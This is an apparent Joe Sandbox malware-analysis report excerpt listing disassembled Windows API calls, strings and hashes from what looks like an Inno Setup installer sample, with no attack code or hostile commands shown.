                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                              • API String ID: 47109696-2199428270
                                                                              • Opcode ID: ff5e046778063e7c615d5c8ac9a6b1d801ca0d933ef60992733312df31d3558f
                                                                              • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                              • Opcode Fuzzy Hash: ff5e046778063e7c615d5c8ac9a6b1d801ca0d933ef60992733312df31d3558f
                                                                              • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C7DA,?,?,00000000,0049B628,00000000,00000000,?,004980A9,00000000,00498252,?,00000000), ref: 0047C717
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047C7DA,?,?,00000000,0049B628,00000000,00000000,?,004980A9,00000000,00498252,?,00000000), ref: 0047C720
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                              • API String ID: 1375471231-2952887711
                                                                              • Opcode ID: 3f7519f2dbd75ec89759c5e36ccc4ab0adc05f47ddd4608262a1c5d06c660367
                                                                              • Instruction ID: edb20439a36284776f78bdf2a161e381ec1662189dfb35441dcb715623f8c11f
                                                                              • Opcode Fuzzy Hash: 3f7519f2dbd75ec89759c5e36ccc4ab0adc05f47ddd4608262a1c5d06c660367
                                                                              • Instruction Fuzzy Hash: 6F410574A001099BDB01EBA5D8C2ADEB7B5EF44309F50547BE411B7392DB389E058F69
                                                                              APIs
                                                                              • 74D31520.VERSION(00000000,?,?,?,ptI), ref: 00452530
                                                                              • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,ptI), ref: 0045255D
                                                                              • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,ptI), ref: 00452577
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: D31500D31520D31540
                                                                              • String ID: ptI$%E
                                                                              • API String ID: 1003763464-3209181666
                                                                              • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                              • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                              • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                              • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                              APIs
                                                                              • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                              • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                              • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID: \AB
                                                                              • API String ID: 4191631535-3948367934
                                                                              • Opcode ID: bca5fbb655e429c390612aedafb62b4dde642c29ff44978b36ddb9eb5ee27a78
                                                                              • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                              • Opcode Fuzzy Hash: bca5fbb655e429c390612aedafb62b4dde642c29ff44978b36ddb9eb5ee27a78
                                                                              • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                              APIs
                                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,004973CD), ref: 0042DE6B
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDeleteHandleModuleProc
                                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                                              • API String ID: 588496660-1846899949
                                                                              • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                              • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                              • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                              • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                              Strings
                                                                              • PrepareToInstall failed: %s, xrefs: 0046BCE2
                                                                              • NextButtonClick, xrefs: 0046BAC0
                                                                              • Need to restart Windows? %s, xrefs: 0046BD09
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                              • API String ID: 0-2329492092
                                                                              • Opcode ID: 37ba51fdfbf3f4723fb08e99647d0fd9c61c097c060f23ffe4e001e6baa90b0a
                                                                              • Instruction ID: b95f389d09e957f91eb9f42d110418d47b08b3dab155efeebd7a2a0376f7d9ee
                                                                              • Opcode Fuzzy Hash: 37ba51fdfbf3f4723fb08e99647d0fd9c61c097c060f23ffe4e001e6baa90b0a
                                                                              • Instruction Fuzzy Hash: F2D12F34A04208DFCB10EBA9D585AED77F5EF09304F5440BAE404EB352D779AE81DB9A
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,00000000,00482EB9), ref: 00482C8C
                                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482D2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveChangeNotifyWindow
                                                                              • String ID: $Need to restart Windows? %s
                                                                              • API String ID: 1160245247-4200181552
                                                                              • Opcode ID: 81628947227ec58f55b2c351f2131b28aedfbb6b6148b8ba4744526014514c8c
                                                                              • Instruction ID: 086790f0fc0b942e3ee9f07944933bacbb32a26cbddea002bc31c7aef2919c1b
                                                                              • Opcode Fuzzy Hash: 81628947227ec58f55b2c351f2131b28aedfbb6b6148b8ba4744526014514c8c
                                                                              • Instruction Fuzzy Hash: 60919F746002449FDB10FB69D9C5BAE7BE5AF59304F4484BBE8009B3A2C7B8AD05CB5D
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                              • GetLastError.KERNEL32(00000000,0046FB4D,?,?,0049C1DC,00000000), ref: 0046FA2A
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FAA4
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FAC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                              • String ID: Creating directory: %s
                                                                              • API String ID: 2451617938-483064649
                                                                              • Opcode ID: d5447365283b068e30203d66d8a9de4eaa18c1a3b89182fdc70a83f7754103f0
                                                                              • Instruction ID: 553d0e02451aea180b77d3c3bea8b04784d1aec5cd58197de2500155b30451aa
                                                                              • Opcode Fuzzy Hash: d5447365283b068e30203d66d8a9de4eaa18c1a3b89182fdc70a83f7754103f0
                                                                              • Instruction Fuzzy Hash: E5516474E00248ABDB00DFA5D992BDEB7F5AF49304F50847AE850B7386D7786E08CB59
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressByteCharMultiProcWide
                                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                                              • API String ID: 2508298434-591603554
                                                                              • Opcode ID: b2872c537cb6cd03ad7726ff2c2bd0a0e2fc6763cd0da9df413ff005d177c2bc
                                                                              • Instruction ID: 0183ab2a96bad10459dc7acb776d15a29b7b4c70eaa7773bbc3cb8db3249cf06
                                                                              • Opcode Fuzzy Hash: b2872c537cb6cd03ad7726ff2c2bd0a0e2fc6763cd0da9df413ff005d177c2bc
                                                                              • Instruction Fuzzy Hash: 1A419771A042189BEB20DB59DC85B9DB7B8EB4430DF5041B7E908A7293D7785F88CE1C
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                              • RegisterClassA.USER32(?), ref: 004164CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoRegisterUnregister
                                                                              • String ID: @
                                                                              • API String ID: 3749476976-2766056989
                                                                              • Opcode ID: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                              • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                              • Opcode Fuzzy Hash: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                              • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                              APIs
                                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 395431579-1506664499
                                                                              • Opcode ID: 9bc7ff361d258be52dd27e2f74bcf33eed5b2b299b3a40fb55461f8ad11e2a91
                                                                              • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                              • Opcode Fuzzy Hash: 9bc7ff361d258be52dd27e2f74bcf33eed5b2b299b3a40fb55461f8ad11e2a91
                                                                              • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                              Strings
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                              • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                              • PendingFileRenameOperations, xrefs: 00455A40
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                              • API String ID: 47109696-2115312317
                                                                              • Opcode ID: 9558350f34ddeb35ff12a6c57317cf96059e68c4625077236ac43c80a8283c08
                                                                              • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                              • Opcode Fuzzy Hash: 9558350f34ddeb35ff12a6c57317cf96059e68c4625077236ac43c80a8283c08
                                                                              • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?,?,00000000), ref: 0047F882
                                                                              • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?,?), ref: 0047F88F
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9A8,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B), ref: 0047F984
                                                                              • FindClose.KERNEL32(000000FF,0047F9AF,0047F9A8,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?), ref: 0047F9A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: d71ed79f5e3cae8dbdb8f9366932315e37cb591a7859d28a8b9a768ac6bf17e9
                                                                              • Instruction ID: 945984253e7709c97adc8e2d755cc1877c70959f01d2b28a808f8207dce1d898
                                                                              • Opcode Fuzzy Hash: d71ed79f5e3cae8dbdb8f9366932315e37cb591a7859d28a8b9a768ac6bf17e9
                                                                              • Instruction Fuzzy Hash: FD513E71900648AFCB20EF65CC45ADEB7B8EB88315F1084BAA418E7351D7389F89CF55
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 00421361
                                                                              • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                              • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                              • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu
                                                                              • String ID:
                                                                              • API String ID: 3711407533-0
                                                                              • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                              • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                              • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                              • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Color$CallMessageProcSendTextWindow
                                                                              • String ID:
                                                                              • API String ID: 601730667-0
                                                                              • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                              • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                              • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                              • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                              APIs
                                                                              • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                              • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                              • String ID:
                                                                              • API String ID: 4071923889-0
                                                                              • Opcode ID: 7a90289248fc1b73338e990bec893a2b2f0b3f31367c070c083f3916a619ed36
                                                                              • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                              • Opcode Fuzzy Hash: 7a90289248fc1b73338e990bec893a2b2f0b3f31367c070c083f3916a619ed36
                                                                              • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0042311E
                                                                              • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
